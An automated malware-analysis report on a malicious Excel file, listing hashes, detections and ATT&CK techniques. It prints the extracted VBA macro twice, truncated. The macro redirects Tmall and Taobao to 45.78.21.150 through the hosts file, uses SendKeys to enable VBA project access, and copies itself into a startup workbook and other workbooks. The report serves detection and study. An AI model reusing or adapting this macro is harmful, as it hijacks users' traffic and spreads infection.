Xls.Malware.Xanpei-9448553-0 Office (OLE) malware analysis — malicious · f88e91c20f8aac2f

MALICIOUS

Office (OLE)

151.0 KB Created: 2015-03-30 00:54:29 Authoring application: Microsoft Excel First seen: 2020-09-24

MD5: b7ffd1e497e542ef09c4eb53887eb0b4 SHA-1: b19ab8bb5938468bb8ffe2bccf11ae26a31d24d1 SHA-256: f88e91c20f8aac2faf51ab24c64f3e49126b4c6b03fe1482fd4c66cf08beee8e

120 Risk Score

Malware Insights

Xls.Malware.Xanpei-9448553-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV and contains a Workbook_Open VBA macro. This macro attempts to modify the system's hosts file to redirect traffic from legitimate websites like www.tmall.com and www.taobao.com to the IP address 45.78.21.150. This is a common technique for phishing or redirecting users to malicious sites.

Heuristics 3

ClamAV: Xls.Malware.Xanpei-9448553-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Xanpei-9448553-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5807 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5807 bytes
SHA-256: `37e11786887fc985393edeebc808eeaa165665f08ae4830041b54131a6356b85`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private WithEvents App As Application Attribute App.VB_VarHelpID = -1 Sub OfficeCheck() Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String SysParh = Space(256) GetSystemDirectory SysParh, 256 SysParh = Trim(SysParh) SysParh = Left(SysParh, Len(SysParh) - 1) SysParh = SysParh & "\drivers\etc\hosts" Sysadd = "45.78.21.150 www.tmall.com" sysadd1 = "#45.78.21.150 www.tmall.com" If Dir(SysParh) <> "" Then Open SysParh For Input As #1 t = Input(LOF(1), #1) Close #1 If InStr(t, Sysadd) <> 0 Then Open SysParh For Output As #1 t = Replace(t, sysadd1, Sysadd) t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com") Print #1, t Close #1 End If If InStr(t, Sysadd) = 0 Then Open SysParh For Append As #1 Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com" Close #1 End If End If End Sub Sub runtimer() Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d" End Sub Private Sub p2d() On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If Dim WBstr$, Wb As Workbook With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub" End If End If End Sub Private Sub d2p() Dim pth As String Dim Exl As Excel.Application Dim WBstr$, fn$, Wb As Workbook Dim ws As Worksheet On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If pth = Application.StartupPath & "\accelerate.xls" If Dir(pth) = "" Then Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number <> 1004 Then Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18 Else Workbooks.Close End If Else Exit Sub End If Set Wb = Workbooks.Open(pth) With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLi ... (truncated)

SHA-256: 37e11786887fc985393edeebc808eeaa165665f08ae4830041b54131a6356b85

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If Dir(SysParh) <> "" Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLi
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.